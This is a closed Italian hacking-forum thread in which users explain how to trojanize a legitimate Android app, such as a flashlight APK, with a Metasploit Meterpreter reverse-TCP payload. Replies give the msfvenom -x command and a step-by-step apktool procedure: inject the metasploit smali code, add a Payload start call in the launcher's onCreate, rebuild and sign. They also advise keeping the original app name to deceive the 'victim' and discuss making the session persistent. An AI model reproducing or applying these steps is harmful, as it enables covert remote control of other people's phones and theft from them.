Domanda Nascondere payload in un apk

Stato
Discussione chiusa ad ulteriori risposte.

Serghj99_JB

Utente Bronze
18 Aprile 2016
30
11
0
39
Salve a tutti.
Essendomi stufato di usare quei payload standard in formato apk mi sono dedicato ad un'altra cosa: nascondere direttamente il payload in un' altra applicazione (molto meno sospettosa).
Ho letto molte guide e visti molti video e ho avuto diverse difficoltà come ad esempio errori con apktool ecc....

Alla fine non c'è l' ho fatta.
Qualcuno di voi è riuscito nel impresa?

Grazie ! :ole:
 
Salve a tutti.
Essendomi stufato di usare quei payload standard in formato apk mi sono dedicato ad un'altra cosa: nascondere direttamente il payload in un' altra applicazione (molto meno sospettosa).
Ho letto molte guide e visti molti video e ho avuto diverse difficoltà come ad esempio errori con apktool ecc....

Alla fine non c'è l' ho fatta.
Qualcuno di voi è riuscito nel impresa?

Grazie ! :ole:
No, ma stavo cercando qualcosa di utile, unico problema che da quando ho aggiornato l'hardware del PC e di conseguenza l'OS, Metasploit non riconosce più il comando msfpayload dal Terminale di Kali Linux.
Non so più come fare... Comunque sarebbe interessante sapere come inserirlo in un apk già fatto...

Inviato dal mio D722P utilizzando Tapatalk
 
Ultima modifica:
Salve a tutti.
Essendomi stufato di usare quei payload standard in formato apk mi sono dedicato ad un'altra cosa: nascondere direttamente il payload in un' altra applicazione (molto meno sospettosa).
Ho letto molte guide e visti molti video e ho avuto diverse difficoltà come ad esempio errori con apktool ecc....

Alla fine non c'è l' ho fatta.
Qualcuno di voi è riuscito nel impresa?

Grazie ! :ole:

Non vorrei sembrare lamer... puoi rilasciare una guida... perché onestamente ci ho provato ma Apktool ha troppi errori...:wtf:
 
con apktool no.. lo si fa con msfvenom in questo modo

msfvenom -p android/meterpreter/reverse_tcp LHOST= <ip> LPORT=<porta> -x "percorso dell'applicazione dove vuoi mettere il payload" -o "percorso di dove va a salvare l'app con nome nuovo con payload (consiglio di mettere il nome uguale identico dell'app originale ma non nello stesso percorso)"
poi invio

ah certo premetto che se uno dovesse usare un antivirus o upparlo in virustotal si nota che ha dei malware quindi non sarà mai del tutto nascosto
 
con apktool no.. lo si fa con msfvenom in questo modo

msfvenom -p android/meterpreter/reverse_tcp LHOST= <ip> LPORT=<porta> -x "percorso dell'applicazione dove vuoi mettere il payload" -o "percorso di dove va a salvare l'app con nome nuovo con payload (consiglio di mettere il nome uguale identico dell'app originale ma non nello stesso percorso)"
poi invio

ah certo premetto che se uno dovesse usare un antivirus o upparlo in virustotal si nota che ha dei malware quindi non sarà mai del tutto nascosto
Ferma tutto... io intendo scaricare un apk Torcia per esempio e modificarlo con il payload...
 
no allora non hai capito... allora se vuoi ti spiego sia come si fa con msf e con apktool..

apktool
apktool d -f -o "original" "file.apk" senza virgolette
apktool d -f -o "payload" "meterpreter.apk" senza virgolette
1) come prima cosa copia la cartella che sta dentro alla cartella payload che hai fatto ~/payload/smali/com/
c'è una cartella che di chiama metasploit e la copi in ~/original/smali/com
2) apri entrambi i file .xml che vedi nelle due cartelle e copi tutte i permessi
3) sempre nel file .xml di original dovrai cercare questo valore
<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>
e nella riga prima mentre lo leggerai troverai una frase cosi android:name="percorso_file"
tu lo apri con leafpad in questo modo
leafpad /original/smali/"percorso_file".smali
e cerchi questa riga
;->onCreate(Landroid/os/Bundle;)V
e proprio sotto incolli questo
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
4) salvi tutto chiudi e ora ricompattiamo il file in apk in questo modo
apktool b original
ora se entri in original ti troverai due nuove cartelle che si chiamano dist e build e dentro al dist ci sarà il file in apk
5) come ultima cosa dovrai firmare l'apk in questo modo
jarsigner -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA "percorso della cartella dist" androiddebugkey
finito

in msfvenom
con il comando
msfvenom -p android/meterpreter/reverse_tcp LHOST=(ip_privato) LPORT=(porta) -x "percorso di dove si trova il file originale" -o "percorso di output del file con malware"
e con quel comando fa tutto tutto il lavoro da solo senza muovere un dito
 
no allora non hai capito... allora se vuoi ti spiego sia come si fa con msf e con apktool..

apktool
apktool d -f -o "original" "file.apk" senza virgolette
apktool d -f -o "payload" "meterpreter.apk" senza virgolette
1) come prima cosa copia la cartella che sta dentro alla cartella payload che hai fatto ~/payload/smali/com/
c'è una cartella che di chiama metasploit e la copi in ~/original/smali/com
2) apri entrambi i file .xml che vedi nelle due cartelle e copi tutte i permessi
3) sempre nel file .xml di original dovrai cercare questo valore
<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>
e nella riga prima mentre lo leggerai troverai una frase cosi android:name="percorso_file"
tu lo apri con leafpad in questo modo
leafpad /original/smali/"percorso_file".smali
e cerchi questa riga
;->onCreate(Landroid/os/Bundle;)V
e proprio sotto incolli questo
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
4) salvi tutto chiudi e ora ricompattiamo il file in apk in questo modo
apktool b original
ora se entri in original ti troverai due nuove cartelle che si chiamano dist e build e dentro al dist ci sarà il file in apk
5) come ultima cosa dovrai firmare l'apk in questo modo
jarsigner -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA "percorso della cartella dist" androiddebugkey
finito

in msfvenom
con il comando
msfvenom -p android/meterpreter/reverse_tcp LHOST=(ip_privato) LPORT=(porta) -x "percorso di dove si trova il file originale" -o "percorso di output del file con malware"
e con quel comando fa tutto tutto il lavoro da solo senza muovere un dito
Grazie delle delucidazioni... Non ero a conoscenza che msfvenom poteva fare questo... Thanks a lot!!

Inviato da uno Smartphone
 
La scelta msfvenom è piu rapida e funziona. L'unica cosa è che dopo qualche minuto che sei collegato col dispositivo (Android), la stessa connessione "muore" e per riattivarla, la vittima deve per forza premere nuovamente sull'icona del Payload per riavviare il tutto. Qualcuno sà se ci sono metodi piu "forti"?
 
Sul blog null-byte c'è una guida su come renderla persistent. Basta caricare ed eseguire uno script in sh


Alessandro Nava
 
Stato
Discussione chiusa ad ulteriori risposte.